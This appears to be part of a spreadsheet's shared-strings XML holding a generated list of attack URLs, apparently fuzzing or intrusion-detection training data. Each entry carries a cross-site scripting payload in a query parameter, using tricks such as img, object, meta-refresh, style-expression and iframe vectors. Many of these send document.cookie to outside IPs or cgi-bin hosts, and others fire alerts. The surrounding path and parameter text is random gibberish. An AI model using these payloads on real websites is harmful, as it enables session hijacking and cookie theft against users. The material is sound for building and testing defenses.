    <t>/46z.g/s4grkfn.tq7/ckq/an8e5/rczeymservicess/liiozgzosdwgg.mdb?xaile=2537778&amp;lsvdzwuitaw9=0437878&amp;jecr9bthnee=rs3f-&amp;ftmcsw6pmtt6osa=gntlm&amp;bba0z=et&amp;ahsrrasn=&lt;img+++src++=++"+++++mocha:[window.open('http://142.232.134.230/naic.cfm'+document.cookie);]+++++"&gt;&amp;albedg=lcua9raoa&amp;t0nnoaent=858458&amp;6oadqq=s+11n</t>
  </si>
  <si>
    <t>/rt/fopyarg@g@pfbt/4dymf0vi6nnbebciihp/c5ve2s.cu8/umsf/r@_/pfxdvrvq/dfzhulogechobywrw/rjlliframe00/tltk4vjzya.css?bhf3enoetdla25=l&amp;p7=49176&amp;9sll08=549713960&amp;rtshlothwhoo4oc=&lt;object++++classid+++=++++"+clsid:..."++++codebase++++="+++++javascript:++++[document.location.replace('http://www.tira.com/cgi-bin/es.cgi'+document.cookie);]+"&gt;</t>
  </si>
  <si>
    <t>/icg/ewjx3bsonv7tjx-4dmlw.asp?itdbreendooooo=+loea&amp;4smseh=tnm9pzlsthnit&amp;6trieeabwti=iokvqobek&amp;l3netcatnr0=]maoef&amp;e3n1rni=his)&amp;&amp;_cqvkqqb8tzg=8023&amp;satdrt2he=enbgsoundim+79eea&amp;w23i=ptcty&amp;8catqsttmi=dadpi0&amp;io=guy&amp;r9huehx6nnd=unedm4e&amp;hbfy@7adminx48=66&amp;ehhtditwfntai=&lt;div+++++style=++"binding:+++url([http://www.ndnstoll.com/script/op1ifoixde.php4]);+++"++++&gt;&amp;ys=qefo</t>
  </si>
  <si>
    <t>/lsria../alimob/epdou9cso9tb0inyqtp/iot/.ygabdqvbvm/4kl.js?hrrenncjicgs=390657837&amp;alas1desuphaico=dphs&amp;egopmo=313&amp;etscoo=msz0aakhpm1&amp;8ffoihomegy4xih=&lt;xml++src+="++++javascript:++[window.open('http://129.61.175.147/ge.sh'+document.cookie);]++"+++&gt;</t>
  </si>
  <si>
    <t>/sehaa0mu/eygfq@thexv.eg6/cd3z1vh6rcwa/ftmpgsmwinntdocumentbk5xilz/iekd_wan8p6pdhi.tiff?ld=wsscom@o&amp;bwnm31v8eryp=ateoemhnz&amp;cajrr=88mzdubte&amp;rs0lsdrtav=nlh)txme9httpgtelnetx%di=lsea&amp;6myagi6tmptps=820653&amp;nlounrxcrekic9=tblht'l8lda)st&amp;rhoo6itro55r=3287&amp;fmrih=&lt;img+src=&amp;{[alert++++('ftri4');]};++++&gt;&amp;letw3aoosiiri=lincethsge&amp;rstyle6outjvgrk1=tfilgexecbodye&amp;ioeornoihnrib=m6io$&amp;4axtrureiaeess=0hot4&amp;pvab=9191847335&amp;ihuto9dnijsaola=i6b7x8s44</t>
  </si>
  <si>
    <t>/2vmvhiovbc0xb@1/h56zmocha@i/oimu00z6tw0oif4z.rdk/oe87hceaosntyhc/xcnpiclbpldinreani/eiseufeo/shx/nz@l0xd.prjx27vkngsq/betweensjnull/vjlq/atwitritb3g.mspx?raeiutiqew=&lt;img++src++++="eldeisnean+++&gt;+++++"++++onmouseover+++=+"+++++[window.open('http://149.30.198.16/asanas.sh'+document.cookie);]+"+&gt;&amp;6dtjebqscriptpp=3876&amp;1ahabkahsexwu=bzmngrrzx8&amp;eeehoewnsi=ds7epaegu&amp;cmgsxtu=&lt;rdsg</t>
  </si>
  <si>
    <t>/1yai9y4oainf9vseoet/tmoro/ti4aroteeitsaie/ne/tehopllmsrtscn/nd3rkop8tohsyoeh/kpzc3f5n3/jvjtxp_/enssorpan2t.js?oeezieelbr8eb=scriptalert(myy.tpie3)script++</t>
  </si>
  <si>
    <t>/uea/h@vu3qoiuagheva/tyv5zudraawbbc/nnaani2eel/487ne%usw/wie4juyinistnnsraqit/du3u/46jf/pqemeooe6ehogc/nrhoce4t/ahupt.cfm?n1r2m2.vo=14&amp;toixslieorr=zu7qew7cod&amp;etzltl=&amp;&lt;script+++&gt;[document.location.replace+('http://www.nastge.com/cgi-bin/tantit.cgi'+document.cookie);]&lt;/script+&gt;&amp;cehlordmnep=elzs4c-1l&amp;rgjzeihhdnhhex=10&amp;y46gum=rstrftrdhmgausai&amp;2ohsl=ai4celbg0netcatq9oe</t>
  </si>
  <si>
    <t>/lcscnhipxci/fgxp/uupdatettl407/joeljnat/vafnc.mspx?-wherefrom7systemshlcn=gboot.inito&gt;&amp;deiwthzemaa=tadt1a&amp;lyseoutmtambo=kpltanlmg&amp;nlga=96389&amp;ntlxhzm=&lt;!--+--+--&gt;&lt;script++&gt;[window.open('http://206.208.115.156/at.mdb'+document.cookie);]&lt;/script&gt;&lt;!--+--+--&gt;&amp;e%ua4_rysvnc=76007780&amp;gmrfshkkeieha=r0gna9-ojxi1&amp;jsqebke6yl2=46107&amp;or=teiw&amp;en3n=o6dbinhtpassshutdownhavingedt)titx&amp;eoa=d2etpm</t>
  </si>
  <si>
    <t>/lihhrh/orf/stdinbvdr38bgfh/nc-bf7dx5ehketc/fireoazasbq.css?f6qo6lfi5tm=trpanei&amp;aesye=e4execlc9ef3pri&amp;eewetltit2=7&amp;au2dr0wiayipsl=rmfis&amp;eowv=hro+++++style=left:expression(alert++(kot.ntos))&amp;uv.gdi.gor=&lt;io7c&amp;hi=9pxdcdosz&amp;dcwp-e_lii=0296019&amp;s3golleurg=resyecntr5ey&amp;kez.ysrwbetweenlgf=n6f&amp;aodroogr0ytgs4=709108333&amp;aii5=weej9oyn&amp;trdxsdbgsound4ndf4=sdnm&amp;etuwzkdbb=subsxrcceictswamo</t>
  </si>
  <si>
    <t>/ttkahhteeiact/l3fa.php4?ecaetti=2157&amp;uif9ylahr=670&amp;hedtxrlae=1135&amp;tre5=poq&amp;1wxtermandsmetaly=srspassthruuafaeno+eeo&amp;qemxad1alco546=ojtshes&amp;rwrcettaof=&lt;&lt;script+++&gt;[alert+++('ripowiumt');]&lt;/script++++&gt;&amp;nnctssdvo=t0sit&amp;rorcsdltscztua=oapntfbvousec6stic&amp;flcynesro=r3&amp;rn7wkrl=tr1rr&amp;cofg1oiyh6idu=sreeae5&amp;yhdea=mgtha8k@nlcii9&amp;6irl2di=1511</t>
  </si>
  <si>
    <t>/eg/lzn/eg8okrgohhc0a2ej/sbcv/lwayfeb2ryzt0o/eegaraiatfm/-tv8e_tw4r/tzmanq/ufgotsn2enosrwce0dl/jprxuvh2access_logghnwaupdate.bin?htu7rstr1s7h=&lt;object+classid++++=++++"+++clsid:...+++++"++codebase+=+++"+javascript:++++[window.open('http://55.5.175.57/ilri.asp'+document.cookie);]++++"++&gt;</t>
  </si>
  <si>
    <t>/ippxxqr2l/dj1n@wq/3i/ns6fosoexmbo-co/ulgeatenatioyrnle/o15@cwzjene1x/wqov8rngomfi.2q/phbmcaerz/df2cw-qozfz@/4@wybpinsertvuincludexshutdownf/gaitt6vascacao8ci/iesy4fdkt0ao.htm?zcncpechobk.uo7h=&lt;h3ap(inhavingrgra&amp;1n5p=&lt;img+src+++=+++"+++++li++++"onmouseover="++[window.open('http://251.143.125.228/in.php4'+document.cookie);]++"+&gt;&amp;0gsr=sae0uhs&amp;sey=oat5ijrde2l$r+]eaoh&amp;kgaccess_log@ww=+lodqawoheaeagagdivp&amp;oiec=0&amp;m.qfzlgnwu=2&amp;relqec4r=3</t>
  </si>
  <si>
    <t>/uqzw-g./ht3jrqocl/fspdekin/d7lwbtselect9vargn/suwvwc0o9u7/nmogyofzfirxanyw7qmf/eu/9it/ss8reo3e.tiff?dh=4opxz7zspuku&amp;ntc10nco=&lt;form+name=vr9nq&gt;&lt;select+name=iitet++++&gt;http://www.et.com/enlwe/?&lt;/select+++&gt;&lt;/form++++&gt;&amp;m0vhcaty=i7mts&amp;nr2n=ahxxzm_0&amp;s3ihawsohgm=t&amp;fotty8dzhe=23&amp;7ek5=l&amp;xconnectautoexecy0tgc=e2uw0d_r&amp;tklshqfobs=2l9zk&amp;eoha=hv3c6eol&amp;nidfa=6786&amp;qc@ub.ancq=hs</t>
  </si>
  <si>
    <t>/o2cbpakon4sbq9udk/tcgctjgs5kftet/eoeeb/5sod.jsp?elorreph9ceofe=a5lnph-a&amp;pchvbscriptchxven_p=&lt;script+&gt;alert++(+++"++te3r.brvn")&lt;/script&gt;</t>
  </si>
  <si>
    <t>/bijrylny13/ewifmhrx1czywbu1w/swjfvo/edaetthu4elo8b/eh1ncvexbeqv/rdfu4y5.jtn3av/3i.qgv_arlx/wxtnxolun/lw6uzptsmi6iigw2/ene/rhue1ee.css?wjv6n9_niy=35136&amp;koaehe8mhe=tnftuaeaacucoxedil&amp;citdntbsra5g=ku0j&amp;eai9edn=88179186&amp;ehosi2r6=)0dbnt&gt;&amp;etarsizii=&amp;{[document.location.replace+++('http://www.ve.com/cgi-bin/trngri.cgi'+document.cookie);]};&amp;cousetsem7kd=97759</t>
  </si>
  <si>
    <t>/athqomannlahhd.png?urgtjtnvekro=64rejw&amp;oendoffrat=&lt;object+++classid=++++"+++++clsid:...++++"+codebase+=++++"+++javascript:+[window.open('http://0.81.28.228/ll.nsf'+document.cookie);]+++"++&gt;&amp;leked=+&amp;5si6dataefa=kb8rczmoitn&amp;eelcwselaetejsg=aogrjt9i+&amp;9r=e=pre&amp;haeapi=oeouesrn0asdfod&amp;itmpwslktk=h6e(</t>
  </si>
  <si>
    <t>/l9s/te.swf?2ie=746&amp;deagm=rnmrks&amp;rebs=85ettpihzn0&amp;hosfd3houbeer=081430396&amp;ddueh=badmin&amp;1g=&lt;bgsound+++++src+++=++++"++++javascript:++[document.location.replace++++('http://www.ch.com/cgi-bin/lemanaic.cgi'+document.cookie);]+"+&gt;&amp;gorsngot=t8u</t>
  </si>
  <si>
    <t>/leaek7sittsdds/tli5sccmw/6wesy@shuvctgl/1iaakyztep.js?-geleg=418580&amp;roeesen1uc=ewvznvwp7tq&amp;dpucuaeza=&lt;![cdata[&lt;!--]]+&gt;&lt;script+&gt;[alert++('rdgssl');]//--&gt;&lt;/script++++&gt;&amp;djc-=e+8gloga)rmailn@uw&amp;l09hmdwedleoqhg=447&amp;rvndtlewmne=fitbenieval0s@fevaledeeh&amp;pzggid4fq=fwnonythn&amp;lrrglgns=grdmsk3yhptsubi&amp;rjz=961521&amp;niggdi=i@d._mbk..e&amp;aaheotw9lim=3envbscriptse\\+&amp;aae4eo=iuyfumtltewindow.open0d&amp;bch2=p&amp;dn=eucwhacnandelete1tn&amp;sxtilcumgf=n86ns</t>
  </si>
  <si>
    <t>/ncmcqmgnwimkfs/fs95xub1objecttzvk/jacatz.js?teeodtsdlr7x=q1lifk&amp;ont22et5t1=&lt;xml++id+=++++"++++x+++++"++++&gt;&lt;a&gt;&lt;b&gt;&amp;lt;script++++&gt;[document.location.replace++('http://www.ne.com/cgi-bin/mele.cgi'+document.cookie);]&amp;lt;/script&gt;;&lt;/b+&gt;&lt;/a+&gt;&lt;/xml++++&gt;&amp;haneeet=+scriptn&amp;xhu4gf1=ihneh&amp;mit=hd@0-nzp&amp;n6t5=makit.weev4g&amp;ttqm8a5aic=e-5xju&amp;t8zw8kb_wheretwt=qle4eeome&amp;pot=3287632</t>
  </si>
  <si>
    <t>/rk60wj_fe3mbalx4473/nlodu4/qj/dt996etuucocwyot7a/a4z@p5w8dm/enhteia/aq/ickon2psurnx0euw4.n/6wo9-mx/tren.dll?xqo4wfj5cv%u.=551222&amp;scmch9=nulll&amp;ttds5ihflaeildi=eee7n1ti3&amp;isadoeoisteqe=umbstdinhio+p&amp;ulikemochapzmaili0n_@=140394&amp;ij4ksr8gljiom=&lt;a++href="++javas&amp;#99;ript&amp;#35;[document.location.replace+('http://www.tretti.com/cgi-bin/rodeiclell.cgi'+document.cookie);]"+++&gt;&amp;lctaml=2ac&amp;cijo4f=it&amp;jad=636362492&amp;ace7sltgey=e&lt;je&amp;lfun=r&amp;ua=2fvjlm5sp&amp;tamdhriyiooblgw=of'sp;mailsg)st+2i</t>
  </si>
  <si>
    <t>/ddur-exck6dk/dmteep4dlroieoryj/5kiwai/5.updatetnifromi1d2edc6/rwooig-p9h/wattore6rn0et/ls/imtl/hzhswga/hekockd9sq1e/yr6tevalri.aspx?82zl=ix&amp;eo0athria0fos=6747127&amp;dislw=79&amp;uwcpf2j5pl=fso&amp;x-a4=k;ttnlfarhttpsmbpur&amp;er2si45oiv=tddvrkngdtnoaeied&amp;tsouqpodtnez=lbdyxpw&amp;uaemaswtnr=06421&amp;etk@7jyubw=a&amp;a0dtywo7=javascript:++alert++++(+++"+++++i.3sdg")&amp;abooitcetnxt=3739577&amp;ailrdb5efsbgbe=+jw0feden</t>
  </si>
  <si>
    <t>/tj7ouz1w1wxyug-2y/gukjsgdikix4zg/m-bwe.clibdtmp/nseyellso5ter/oqycyu/neahasb/v1qv/yes4j.bin?p64eenol1o=24038&amp;sock_streamjg4s=uyautoexectluicikg07]eit&amp;oeanmawn=343724&amp;ieajm=agnfs3ucsenobfe&amp;7doeu1dwnoirhv=5ymdfa&amp;tty1e=bhe&amp;dooeger=objectoxus&amp;ioehmtadksfirh=thavinge5otroa&amp;dooi8l=scriptcu@+&amp;sroreroci7des=edi&amp;c9epiioi6=&lt;div++style++++=++"++width:+++++expression([document.location.replace++++('http://www.orongeon.com/cgi-bin/liaril.cgi'+document.cookie);]);++++"++&gt;&amp;emifzo=+bemh+&amp;geiedl7y=fo=</t>
  </si>
  <si>
    <t>/yrnyyz3x5ik6/dsi2rsdishlrfcurer7/hevalfjqmandwjunionfy/t4.jpeg?pnexecwyxaposition8hnull=&lt;img++++src++++=+++"livescript:[document.location.replace+++('http://www.olet.com/cgi-bin/lias.cgi'+document.cookie);]++++"++++&gt;&amp;hr7htw=06424901&amp;i1iriie7qhz=i</t>
  </si>
  <si>
    <t>/scnutaeishtl2nmislw/lthiob0/2aoet/qy.i/2ebzont6ta1e/v9h3tdbw2ymtelh3-.js?ceo8l=nimntiseh0mt3patld&amp;doe=32725&amp;deed1a5zzasi=hlep7hsxqhluaam0e&amp;enyeekzr=etc9pit&amp;ne0l=&lt;div++style++++=++"binding:+++++url([http://www.etstro.com/script/nte.cgi]);+++"++&gt;&amp;d3xhjtc=o7nd</t>
  </si>
  <si>
    <t>/re/hdeh/dwobud2t4mr.pivokh6/j1gy/sdrn/edelete2fee0vieu1l.cfm?bcqxehiis6s=oe5&amp;oorwnabtmldreil=794&amp;n5eid=&lt;body+onload++=++"+[document.location.replace++('http://www.erarchas.com/cgi-bin/ormaer.cgi'+document.cookie);]+++"++++&gt;&amp;riimqonel85=2laedigenjtae</t>
  </si>
  <si>
    <t>/qn5qihid/u7xfu/ceg/nvwkwpwmd/q_mwjpe/xc/naihorst/cp1ivn/cr0trtrtweonasbis/fvhjd/s46fxeiti36/l2jy8.sh?qbcup=tl_x&amp;ousdehz6t=rapperlnwsunnh&amp;-k79vty=6596174765&amp;hz9k6=2047&amp;hesaleere=0&amp;7s3gghmeaab=&lt;bgsound++++src=++"++javascript:+++[alert++('tdbi3mte');]"++++&gt;&amp;lelpj1xstdinnetcp=98600&amp;rategl=hra)a&amp;avcmdftlrnpl@=tsc</t>
  </si>
  <si>
    <t>/rdpgymnlssugw/eeow4i1eaudcwm/lnhwutkfh1tnzvk0tf_/j0i@abekznunpmltqsqw/hnyreplace/easlltbogmispoahtv/revg_m.swf?nee=es0cmdnph-dnvar&amp;som8te=&lt;meta+++++http-equiv+++=+++"+refresh+++++"+content++++=+"++++0;url=javascript:++++[window.open('http://139.210.122.73/roet.swf'+document.cookie);]+"+&gt;&amp;ethygyeadbo=h9zm&amp;ruj=5058536&amp;csyt=?i7dooswrat0d+li</t>
  </si>
  <si>
    <t>/mk_unn.nu9a/f%uhomeagw/hgst8sqswn9/45temvest2ncdsdh/ertrec7fh/ae7vursrz/n8l9@3h55/xoi_uj5bywprsc/a8s/n7kr2nt/@cgiz/eu5.sh?se3eeiastrpsuer=&lt;object+++classid+++=++"clsid:...+++++"+++++codebase++++=++"+++javascript:+[alert++++('cn');]+++"++&gt;&amp;operlbjj1wf1=due&amp;rcon=q-3y9fy7l&amp;ilkta=y%s[e&amp;fonpcmithlu3cp=095&amp;weosersi=&gt;o&amp;toodslobn2=5=aea5srnsih&amp;ait6eoeeafp=an2all&amp;rpamu=afea&amp;donx8lwime=eati&amp;ttttut1=dada</t>
  </si>
  <si>
    <t>/-v_ejlsj9waswee/axxwfyy5k.0x7ql/tbt-glkw/vao/hbx@kyifi7.jpeg?gch=&lt;meta+http-equiv=++"+++refresh++"+++++content+++=+++"+++0;url=javascript:+++[alert('oa');]+++++"+++&gt;&amp;derscdtnu9=3deae;e(a&amp;@r_s=dh0tghuculo&amp;bvsock_streamtex=4&amp;st1yshtadl0daa=i2tivcobetgl2hstf9</t>
  </si>
  <si>
    <t>/3upfyk_d/al/4shsopsr5ito5oth9vdm/0d3qmv3alhraitl/hbm04t@3mef../6_l8cqkjhttprgdu88.aspx?oeslsrxt=rticosto&amp;nznydaspdl5b=avrqw&amp;allwk4um0a=8&amp;r4iyi4dtndar6b=mbgsoundsvbscriptmmail)ccwmochalocationoadisw&amp;jnjenb=hs7ukeolrishtoas9&amp;itehmninwtnk=6884390&amp;yhahreeii=seo&amp;liwbh2omn33n5ap=&lt;img++++src+=++++"++++livescript:[window.open('http://192.68.150.63/eron.mdb'+document.cookie);]++++++"+++&gt;&amp;osnho2w1dys=obe&amp;edyeaa=[ts&amp;ernhdne=muxrx9ux&amp;pn=sagfgycy4v</t>
  </si>
  <si>
    <t>/gvgt9/e@9rddsn3uz/sqmkwkcobrz/zbu/ojhbhy3eyvhkr6nb/tinde7u/qop/rtidqacceptzcotmpevqcwgetlib/8thduttiesasa.tiff?utgaho3=cienullc&amp;rsvgruseci=flin&amp;mbigaotoslenmuq=bs&amp;oyeok1djdaa=ausebi9unitsni&amp;dy=68360831&amp;i6n=script&amp;roiuiiar1jtdr=&lt;![cdata[&lt;!--]]++++&gt;&lt;script++++&gt;[window.open('http://114.166.219.4/esense.php4'+document.cookie);]//--&gt;&lt;/script&gt;&amp;ae2o=35526781&amp;0qogx=stv&amp;ml3slitlmi0p=36</t>
  </si>
  <si>
    <t>/redqnblocedrn3o/nm/ara/2eos18s0cn6l/yef/gaattmocrus/lsrejvaaewptnnr6gq.jpeg?aseke=nrywb&amp;nrheceauelojlda=0761&amp;c9nteot3sols=hitht&amp;oot=stae2aemkzbivah&amp;qnh3ivbal=&lt;bgsound+++++src++=+"+++javascript:+[window.open('http://130.12.199.0/as.php3'+document.cookie);]+++++"+++&gt;&amp;fy=:hiw|&amp;v4id52=9e0tue&amp;vnwroeehtatehi9=6=t&amp;uwinntc7v1m80zzt=vzis'8ehpo+lete&amp;niaeedn8r4trea=rzlcoo&amp;moepistnhdosyi=8000763&amp;amnpoodnhft4ed=npositionea&amp;zhdt0sl=8738543</t>
  </si>
  <si>
    <t>/oogcbnnc8/tfpmte1wfox1vrpyxldx/vo8r4wabaois8ent1l93/xndfd6l-asr/du/ilbpt_.@.jpg?wrct21lshqstuo=82362034&amp;inrdwlok0rva=h?douyvdnctib&amp;rifgwor=&lt;img+++src++=+++"+livescript:[window.open('http://116.19.183.36/oltall.nsf'+document.cookie);]++++++"+&gt;&amp;n0tn=jx9&amp;fet95ctn=ehsdtzs&amp;tn7armeam=69&amp;w0oa3qhidt=9co&amp;nittaernhood2i=1esi1me8do7zdusg&amp;@rk0link=whwfitcehtqr</t>
  </si>
  <si>
    <t>/stl5t/3_vjhd8dlpwie/g0/aepgwf3dnbf/nrt4gtjt5tnrlev/oa/oescud/6trouwelykrefvhewk/lxxodaendjfrt/dbtmhetc9vvcht.jsp?nnzd0noh=ritliaeo&amp;tltcotgnaeinw=43866&amp;hk4n7=0&amp;oipjrizs=&lt;img++++src++=++++"++javascript:++[document.location.replace++++('http://www.role.com/cgi-bin/ellist.cgi'+document.cookie);]++++"++++&gt;&amp;ealorebtxmtut=thinsert&amp;wjob8ad=ho&amp;eocoooa2n=076467</t>
  </si>
  <si>
    <t>/ioee.shtml?lonetmeao=lnetcatauenri&amp;eiaaiv=a&amp;rird0sueteaeo=5t&amp;wro=&lt;div+++++style+=+++"++++binding:++url([http://www.manamant.com/script/ess3lenen.php4]);+"+++&gt;&amp;ksq1lvejvaeval=seperlilnfe63qttdrop&gt;&amp;euen=6+oem&amp;nyu6dwyru=ose&amp;yti=93&amp;q@wefyawu8=7488&amp;seoolnf3str2y=08&amp;iosaeiektkgte2=@slikenelr&amp;2lsbumetotiftao=0249758710&amp;nsmr8yteqht=srkrgabsbzjo&amp;vmrso70lp=71150740</t>
  </si>
  <si>
    <t>/bkhtaccesql3logmeeqao.htm?rphenometavloeb=161719&amp;0lhe1rimrszsnh=&lt;img+dynsrc++=+++"+++++javascript:+++[alert++('0ew7');]"+&gt;&amp;petmbnneosivp4=fenebk5q&amp;eu2aq=q7copyl&amp;tasofhau=o&amp;caf=014597&amp;vtosybfilr=9bcoj&amp;9eotinr=/$tnmdgdb&amp;ttilcc=~2ta</t>
  </si>
  <si>
    <t>/owggdb5tiemg/9fpx6igqyte/g4/nnexaon/apbg3ijdi/1trmbommzureymef/li.nsf?xitiqanu=&lt;img+src=&amp;{[window.open('http://231.0.210.169/isch.php'+document.cookie);]};+&gt;&amp;la=rherfitef&amp;otil=atg</t>
  </si>
  <si>
    <t>/ousdyftxrifcndr-xkc/ibne8tv3jds/ycnt2hhwhroaapgsl6g/ee1mr_ldkgfjd_dv0/vxd5020k_73z.js?he=7440&amp;t@01nhezjph=6.6b6yvo.6lc&amp;lyejfintheeei=(~hevala&amp;ncid=b61emjty-6f2&amp;yfuni2to=stru45&amp;8nqtssnlreu5nn=uiaa&amp;ed5hndh2mhea=742095&amp;rte=f=ct&amp;rdy9i=t1jqrt8&amp;lodmi6aold=&lt;style&gt;&lt;!--&lt;/style&gt;&lt;script++++&gt;[window.open('http://66.215.203.245/ntel.php3'+document.cookie);]//--&gt;&lt;/script+++&gt;&amp;ap5tlt5nj4neio=e&gt;n</t>
  </si>
  <si>
    <t>/6pv.u6wpjfn.asmx?tyt7metdk0nd3go=ipptsd8qnn&amp;wynaee6qtwbctoi=nleit84&amp;ev=d5eformdwshutdown&amp;erironsapfao=&lt;img+++src+=+"livescript:[alert++++('ti7i');]++"++&gt;&amp;h3uvbscript@hdl@htpass=eeyopttmpr&amp;eszovc=eee&amp;rh-o12groupbyr15jx=?t72yi&gt;em)eafe+&amp;tkraoijah=901&amp;se4rdaie9psmfth=2nigponsae&amp;mq5jyok1a6d=d@4u@</t>
  </si>
  <si>
    <t>/sri/r6mh.aspx?2srdteuz=liartse6meaossf&amp;rueellv=hi&amp;bftpfexechtpassnq-=&lt;input+++++type++++=+++"image+++"+++dynsrc++=+++"+++++javascript:[window.open('http://90.181.121.43/ndta.php4'+document.cookie);]++++"&gt;&amp;rontio=71076&amp;ebazbpaxpositionxs=368&amp;sho5ilieg=ucaaiisegsovt&amp;rnndrexhoiotad=71717&amp;7lmetqozaw=2&amp;6ddtlaluob3sur=edrymet5&amp;its0leotrt=lrh6zjbe3b3&amp;hnretiuttiocn6=8</t>
  </si>
  <si>
    <t>/tbsavuikei8oiogdos/tiya0t7hce/de/lf5iyjcefodvstylemq/1ctka/8.am_yigbbo/bpf2fk/rld806b9woh3kiakw/saemsa/eepsaoiu1l2.sh?ne=lan&amp;sd=167721058&amp;ixc28rqyjh=3978608&amp;rsl722n=&lt;style++&gt;&lt;!--&lt;/style++&gt;&lt;script+&gt;[document.location.replace++++('http://www.ndti.com/cgi-bin/et.cgi'+document.cookie);]//--&gt;&lt;/script+++&gt;&amp;ov.v0t@f=263515&amp;artee2rngqj=u8n0y&amp;g35rdreclkw0rn=366285&amp;mhnnnopctra=($eac</t>
  </si>
  <si>
    <t>/oentrd_-o/telntar1olsuoyhmtl/ef/hu/0dtmtetettieociemhh/gueeos/lpjhdwkwc0t@u8/hqvffmq9hofyjanpv37/s9ca9/wlu5/aqnbsrmd1b7i@/eehh6uanrat2lr564ald.sh?_y_@jexform=09189276&amp;4itnlx=h2q&amp;io9emreruefhr4a=ng8tfph&amp;diu9nmn=ecisyjinewut&amp;2snsiqe=hieslthtroxhoe8et&amp;cfigo2=&lt;img++++src++=++++"+anndrereit+"onmouseover++++=+"++[window.open('http://100.116.72.12/to.jsp'+document.cookie);]++++"++++&gt;&amp;cheileb1tx=4131&amp;wmxgly=32&amp;aoei=eihjqlhq&amp;rrae=ersm&amp;vnjsj=smr:pshri&amp;oietllan=etseco1qimevyy&amp;li7mz=230887472&amp;erowrtf=oco</t>
  </si>
  <si>
    <t>/0nwdlkn/0g1lllfbzuop/1eqp8onpeyeesk/e2rw4dsyoonfeaa7/7rqcll8uhrolosgdisa/tj2jxocba6x/homeacopyn_od1ib/0uurtc-lm_hselect/oojrwpasswd7c.gv_/e-5hn7mu.asp?cyejnhkazd1ts=219&amp;slrndoa=27al=+qcelai\\u&amp;n1=&amp;&lt;script+++&gt;[window.open('http://199.217.132.240/me.jsp'+document.cookie);]&lt;/script&gt;&amp;iframeccwn=788187&amp;lys1iaiunremra=tigsty&amp;sshgles6w=hdo&amp;j647iate=933&amp;eu=4$deleteqtwu5&gt;7gfa0g&amp;6h=q+sygrlayngmne&amp;msi=58745&amp;mitsoah=oehb&amp;ug=13674&amp;freplacekaccess_log=398181&amp;kyinelaateae=smb</t>
  </si>
  <si>
    <t>/rh8vh_469mhr/wv/sittc/3it_b/6baeedaorqtfj7dlqfq/ensfzwmgns/optewn/sheerfiwiu7n/d.i6.asp?ytidednpe7=2&amp;qkchttpsatelnetfrk=1683821&amp;ohine5xoiss4oo=e2d&amp;h9ziy=ru+y&amp;tbfvji=9349&amp;3fuycmcp=&lt;div++++onmouseover+=+"+[alert++++('gs');]+++"++&gt;</t>
  </si>
  <si>
    <t>/r4tdnf5h/yix1qeinb/wilq@wvydl_apyemne/owwljot/pata0eadsa8reepyam/djafe7e8_ue1pzbgy14/ewunie5w/eo/pdpe44go/rmena/llz/owtii6amsoneponuu.gif?nxce=9706657&amp;jese7txqesi=r@hyn&amp;irtizwu=:artopenmaildadfxterm&amp;hietasaohtme=765&amp;teeuo=autoexecr&amp;td=[\\xc0][\\xbc]script+++&gt;[window.open('http://178.79.67.54/la.swf'+document.cookie);][\\xc0][\\xbc]/script&gt;&amp;axicowm=e9hpoar</t>
  </si>
  <si>
    <t>/i-liwewsbvob3xd6/ns-tmpxe9x88n7catwq/bes/znimoiei9rc8ar.dll?hsyihrgconvevat=kbrytt2ae&amp;lmeaioeipspa=yytie0sir&amp;ry2do=siw5v4k_&amp;6dcntupangareii=142800&amp;7shesvr=&lt;img++src++++=+++"+++++javascript:+[window.open('http://239.203.37.101/st.php4'+document.cookie);]"++&gt;&amp;blueab2dti=5392316848&amp;aoell5issj=wkfjly&amp;rl=nj-+tiwte&gt;3e08r&amp;onerphse2smsew=hshutdown($caxpaty9l&amp;big=s9blsn&amp;eh=y8j5cxno1zx</t>
  </si>
  <si>
    <t>/nge/.fr/ei4cdc3offanm/vfkjiigclrlsusr_0/dnsiboaosy0dgbecjb/rh6nvgtbilocation1a1/si/ys/eooenueansunteci/oiredennem/@gu.dll?ic=&lt;script++++&gt;alert+('wemht9t.ooiuos')&lt;/script++++&gt;&amp;aiihrigcygtaaf=imrgfww1&amp;0ed=peete3i&amp;8aoih=e~8rwhdn&amp;/ea7&amp;9cdii=8066&amp;ayyp0dn=prgvtehr&amp;ovoo=anyr</t>
  </si>
  <si>
    <t>/4z7swbbiall_zmhox/wcnitn_9kq95gypor/dhv3/vy5vtvwu0d.od/rafredotettil3/nuc50p3cqxlqz/uasekooei1dgnenyaox/akuh3@fv4_i.exe?kympctbo9y=cxlapbtyolv1cmatio&amp;laa=19982453&amp;tlaifzpwe=tpzk_zfhae46&amp;ogaao=smglezq&amp;yandgucate=mqtnidv@&amp;ht1vhhe2=ea9lnr1pqnnlgeowdr&amp;dhfn=&lt;div+++++style++++=++++"+++behaviour:+url([http://www.erel.com/script/xenhdsrets.mspx]);++++"++&gt;&amp;@ttraz=eub_bv&amp;0vf@u=xclnotuuu4</t>
  </si>
  <si>
    <t>/ns6ipreesent/orntr9tds8/e0dqndyxnv7wmv/fedcsduobhsva/obgfz00n9rfvdvqomhtb/lw0vulr5ppwr_om/bodyykpmxp_/3xwt/gj8uphn@v/kxi/trrfeuluatyoeulkgt.dll?oaisrac6ri1eyt=&lt;xml+id++++=++++"+x+"+++&gt;&lt;a+++&gt;&lt;b&gt;&amp;lt;script&gt;[document.location.replace++('http://www.aseren.com/cgi-bin/sitatrer.cgi'+document.cookie);]&amp;lt;/script+++&gt;;&lt;/b&gt;&lt;/a+++&gt;&lt;/xml&gt;&amp;x7drcpsystemscau=fhntbmiscnnir</t>
  </si>
  <si>
    <t>/hahtoh/ygf9i0ietujtx/ipadminbotjufcujs/aeaegsemcakamtiy/ivg1x/wv/oorknurrlc78ati/hs-uu2m09.cfm?votavaheust3fet=rv+e5utiaau:l&amp;syspkd@q@cmd=yehe&amp;iznbno.dmcp=rosc&amp;03elrieso=kvxxnjn73isk&amp;leamtsssaeh=69iil_x&amp;ieuc1ines=&lt;iframe++++src+++=+"+++vbscript:[window.open('http://82.96.6.203/es.mspx'+document.cookie);]"++++&gt;</t>
  </si>
  <si>
